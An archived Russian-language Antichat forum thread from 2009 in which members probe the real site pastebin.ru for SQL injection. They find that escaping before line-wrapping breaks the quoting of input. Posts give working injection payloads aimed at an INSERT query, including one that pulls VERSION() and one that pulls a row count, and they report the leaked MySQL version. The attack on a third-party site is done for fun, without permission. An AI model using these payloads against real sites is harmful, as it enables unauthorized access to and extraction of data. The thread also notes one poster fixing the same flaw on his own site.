ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
Давайте хекнем pastebin.ru |
25.04.2009, 14:18
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Давайте хекнем pastebin.ru
В общем хотел запостить туда скриптег, а он мне MySQL error кинул, ну поудаляв куски кода, понял ато у него аллергия на этот код
Код:
чё тут было неважно :)
Код:
Query failure: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '; ?>',303345)' at line 1
insert into pastebin (poster, posted, code, parent_pid) values ('Гость',now(),'',303345);
да, тут INSERT но если найти на сто имено он реагирует, малоли... У меня не получается понятб что имено ему ненравится
Последний раз редактировалось Ponchik; 25.04.2009 в 23:29..
|
|
|
25.04.2009, 14:25
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
АГА!!! Я ПОНЯЛ!!!
Щас раскажу  )
Тама чтобы код не разъежал сайт его режут, токо тама сначало идёт экранирование, потом режут, хы хы (кстате надо у себя проверить такую уязвимость)
И такой код
Код:
a''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
Тоже вызывает SQL Inj
Получается
Код:
...\'\'\'\'\<перенос>'\'\'\'
Токо походу ничё с этим не сделать интересного
Нате, вот
Код:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaa'a
P.S. Прикольно, у мя тоже такая дыра на сайте есть 
Пойду фиксить
Последний раз редактировалось Ponchik; 25.04.2009 в 14:31..
|
|
|
|
25.04.2009, 17:12
|
|
Пачка маргарина
Регистрация: 14.07.2005
Сообщений: 964
Провел на форуме:
4646474
Репутация:
1424
|
|
Сообщение от Ponchik
Токо походу ничё с этим не сделать интересного почему нельзя - скуль же полноценная а в insert можно подряд несколько значений вставлять- тоесть можем результат любого запроса вывести через подзапросы.
PS мне больше нравится pastebin.com
Последний раз редактировалось ShAnKaR; 25.04.2009 в 17:16..
|
|
|
|
25.04.2009, 18:15
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
zlo12, да нет, тут были месаги но их потёрли
Получается я новый вид SQL inj уязвимостей нащёл? DD
wordwrap() зло
ShAnKaR, ну чтоб закрыть запрос нужна ещё одна ковычка, а она получится только с слэшем \ ну вобще если мозг помучать то может чёнибудь и получится...
P.S. А ведь ачать тоже режет так месаги О_о Хммм...
Хы, тут правильно, сначала wordwrap потом экранирование
Последний раз редактировалось Ponchik; 25.04.2009 в 18:17..
|
|
|
|
25.04.2009, 18:29
|
|
Познавший АНТИЧАТ
Регистрация: 04.08.2008
Сообщений: 1,359
Провел на форуме:
8220635
Репутация:
1593
|
|
зачем собственно его хакать?
|
|
|
|
25.04.2009, 18:32
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Хотя вот....
Код:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbabbbbbbbbbbbbbbbbbbbaaaaaaaa',QUERY)/*
Это поле parent_pid, токо оно по поду никуда не выводится... |
|
|
|
25.04.2009, 18:33
|
|
Постоянный
Регистрация: 12.02.2009
Сообщений: 527
Провел на форуме:
4566140
Репутация:
0
|
|
Сообщение от root_sashok
зачем собственно его хакать?
чтоб было!
|
|
|
|
25.04.2009, 18:43
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
ЕСТЬ!1111
Код:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbabbbbbbbbbbbbbbbbbbbaaaaaaaa'+VERSION(),1)/*
Версия 4.1 |
|
|
|
25.04.2009, 18:46
|
|
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717
Репутация:
1980
|
|
Сообщение от Ponchik
Получается я новый вид SQL inj уязвимостей нащёл? DD боян
http://forum.antichat.ru/showpost.php?p=911841&postcount=2
http://forum.antichat.ru/showpost.php?p=970729&postcount=3
|
|
|
|
25.04.2009, 18:47
|
|
Постоянный
Регистрация: 30.08.2005
Сообщений: 730
Провел на форуме:
6828219
Репутация:
2274
|
|
Чёто непонимаю чё он от мя хочет
Код:
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbbbbbbbbbabbbbbbbbbbbbbbbbbbbaaaaaaaa'+(SELECT COUNT(*) FROM pastebin),1)/*
[Raz0r], фигово... Ну тогда я в контру |
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для [Raz0r]](/avatars/avatar33548.jpg?1242945){kind=avatar}
Похожие темы
Линейный вид
